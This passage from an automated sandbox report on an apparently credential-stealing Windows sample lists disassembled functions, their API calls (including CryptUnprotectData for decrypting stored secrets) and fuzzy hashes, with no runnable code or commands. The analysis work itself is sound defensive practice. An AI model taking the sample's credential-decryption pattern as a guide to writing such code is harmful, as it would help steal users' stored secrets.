                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: e60c0c1cb9e4bb81eb2a8eab3684a0e8ffd5cac3afda8384b53a0d796bd52f0e
                            • Instruction ID: ffefecb60f986244ace62381aecf2340be724433c7c01d7c95922fac316d3209
                            • Opcode Fuzzy Hash: e60c0c1cb9e4bb81eb2a8eab3684a0e8ffd5cac3afda8384b53a0d796bd52f0e
                            • Instruction Fuzzy Hash: B7110370300208EFDB04CF64EA85FAB37A9AF89314F10A45CF9199B240DB76EC42DB60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00ED0E00,00000000,?), ref: 00EC79B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC79B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00ED0E00,00000000,?), ref: 00EC79C4
                            • wsprintfA.USER32 ref: 00EC79F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 43b64f197d0b91ed2581b24125cf7f051fe6252924d35c818101e8d639a18027
                            • Instruction ID: f4f437b70fb7ff7ad3a24423afeb7f1d89e1b4ba24dd3ac6f2cc17e129251ed0
                            • Opcode Fuzzy Hash: 43b64f197d0b91ed2581b24125cf7f051fe6252924d35c818101e8d639a18027
                            • Instruction Fuzzy Hash: E21118B2A04118EBCB149FC9D945BBEB7F8FB4CB11F10411EF645A2684E27A5941CBB0
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00A9D9C8,00000000,?,00ED0E10,00000000,?,00000000,00000000), ref: 00EC7A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00A9D9C8,00000000,?,00ED0E10,00000000,?,00000000,00000000,?), ref: 00EC7A7D
                            • wsprintfA.USER32 ref: 00EC7AB7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: cfe716ea19609bebbbcc378ca7fa9164b1016a44194152ea205802ac418212d9
                            • Instruction ID: 82c71ffb317bc86161dedacc698d1893c15e595d6bca91f110cbd4f8d3e16c8f
                            • Opcode Fuzzy Hash: cfe716ea19609bebbbcc378ca7fa9164b1016a44194152ea205802ac418212d9
                            • Instruction Fuzzy Hash: 53118EB1A45218EFEB208B54DD4AFA9B778FB04721F10439AE90AA32C0D7791E41CF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /IW\$EL$XY{
                            • API String ID: 0-1040778048
                            • Opcode ID: 514d35179c10932b4b8002f05c65a4c405e1cf092e164f2a297b01af86ca292f
                            • Instruction ID: fff062dcc075673196013ca48ab9e53b94f37ab170031fc4ca475254cf0ac8a2
                            • Opcode Fuzzy Hash: 514d35179c10932b4b8002f05c65a4c405e1cf092e164f2a297b01af86ca292f
                            • Instruction Fuzzy Hash: 0CB207F360C2049FE308AF29DC8567AFBE5EF94720F16893DEAC487744EA3558418697
                            APIs
                            • CoCreateInstance.COMBASE(00ECE118,00000000,00000001,00ECE108,00000000), ref: 00EC3758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00EC37B0
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 9e99ea2b1e3c84db654b1b5d4dd2a8e9c8fd77d1837a9706f37912636313212e
                            • Instruction ID: 4743588455843dce2eaa7e8026ba46f36e2b2af03b536c32304fb20c3dbbbd69
                            • Opcode Fuzzy Hash: 9e99ea2b1e3c84db654b1b5d4dd2a8e9c8fd77d1837a9706f37912636313212e
                            • Instruction Fuzzy Hash: 5D410971A00A289FDB24DB58CC95F9BB7B5BB48702F4091D8E609E72D0D7726E86CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EB9B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00EB9BA3
                            • LocalFree.KERNEL32(?), ref: 00EB9BD3
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 6a1e50b97ce321f45e733242dd3d7d81689924eb56e6e0a5d8c701e63b98d7f2
                            • Instruction ID: f9555a54dc79cae965b1144f1cbcd2c0d4aeee6df475c20ea169194c84a269c5
                            • Opcode Fuzzy Hash: 6a1e50b97ce321f45e733242dd3d7d81689924eb56e6e0a5d8c701e63b98d7f2
                            • Instruction Fuzzy Hash: BB11B7B8A00209EFCB04DF94D985AAE77F9FF88304F104598E915AB354D775AE10CFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: A=yo$CRq$t6Z
                            • API String ID: 0-3946353037
                            • Opcode ID: f503c4cb5ab4740103c043767eaaa84cc38d02ae7d5f0ee774a229d46841c03a
                            • Instruction ID: e6cbb07063df169d23afbcffbc83d93d1f11905268327c81f6f977273923600b
                            • Opcode Fuzzy Hash: f503c4cb5ab4740103c043767eaaa84cc38d02ae7d5f0ee774a229d46841c03a
                            • Instruction Fuzzy Hash: E85189F3E183180BF3586D69EC45776B2DADB90320F2A453EEA55DB380FCBD59058286
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Y'o$a]}
                            • API String ID: 0-413318234
                            • Opcode ID: 963ef4c842790ca67ac903eae002c1c2ee2a19d0218433ba01a8d4578ad4e54e
                            • Instruction ID: e614c40e65afeb1e78f048d9b3399afe70b69374ce9705857b21d4ed0142b084
                            • Opcode Fuzzy Hash: 963ef4c842790ca67ac903eae002c1c2ee2a19d0218433ba01a8d4578ad4e54e
                            • Instruction Fuzzy Hash: 59615BF3A081149BE708AE2DDC0577AB7EADBD4720F16C63DE6C8D3754E93598068286
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: wIw~$X^
                            • API String ID: 0-987846827
                            • Opcode ID: 49db03c66f424a89db41d52e0c796f5f7f91fe744ee17c13204d0915401a7d90
                            • Instruction ID: f24fe4a0d3fc399a575dcb2ef10292468f8b326256cd40b237b37f80669c378e
                            • Opcode Fuzzy Hash: 49db03c66f424a89db41d52e0c796f5f7f91fe744ee17c13204d0915401a7d90
                            • Instruction Fuzzy Hash: 4E516AB3E183144FE3046E3CEC94776BBDAEB84350F2A423DE9D493784E9755D048686
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 3{DY
                            • API String ID: 0-500985011
                            • Opcode ID: 6474fe4dfae64ea4001594f26bd16033f8230f6242dae42b0cec3500cb8e10f6
                            • Instruction ID: e9b70e703e81e2173cdb49fb3cd52591285a0a7597f67d16a4d9f3b9d128dec6
                            • Opcode Fuzzy Hash: 6474fe4dfae64ea4001594f26bd16033f8230f6242dae42b0cec3500cb8e10f6
                            • Instruction Fuzzy Hash: 2C22F8F36082009FE704AE6DDC8577BBBE9EB94260F1A493DEAC4C7744E67498018797
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 5|\
                            • API String ID: 0-3903327528
                            • Opcode ID: 9f91265b3be51c6b73ef4243bc1be9968daba399ea4a49ffa7fbe0a3c42a58c5
                            • Instruction ID: faa852580f364507157ece74a75760ee6ab9188c12c9a7a46a0ecd8aa69219d7
                            • Opcode Fuzzy Hash: 9f91265b3be51c6b73ef4243bc1be9968daba399ea4a49ffa7fbe0a3c42a58c5
                            • Instruction Fuzzy Hash: 305137F3B1C6005FF3086E68DC917BAB6D5EB94320F1B453DE788D7780E5799840428A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: v1
                            • API String ID: 0-3113600009
                            • Opcode ID: d061bd9c665eaac562cc38d74e6a9eb7670083273713579c53882f03964dbd0d
                            • Instruction ID: c77ec4e3954c2f7f867a7097376eb78b3f5bbef786bfd34e93490e3f731af073
                            • Opcode Fuzzy Hash: d061bd9c665eaac562cc38d74e6a9eb7670083273713579c53882f03964dbd0d
                            • Instruction Fuzzy Hash: 1B5156F7E081105BE308AE2DED0573AB7D2DFD0720F2B863DD98987784E9399C058692
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
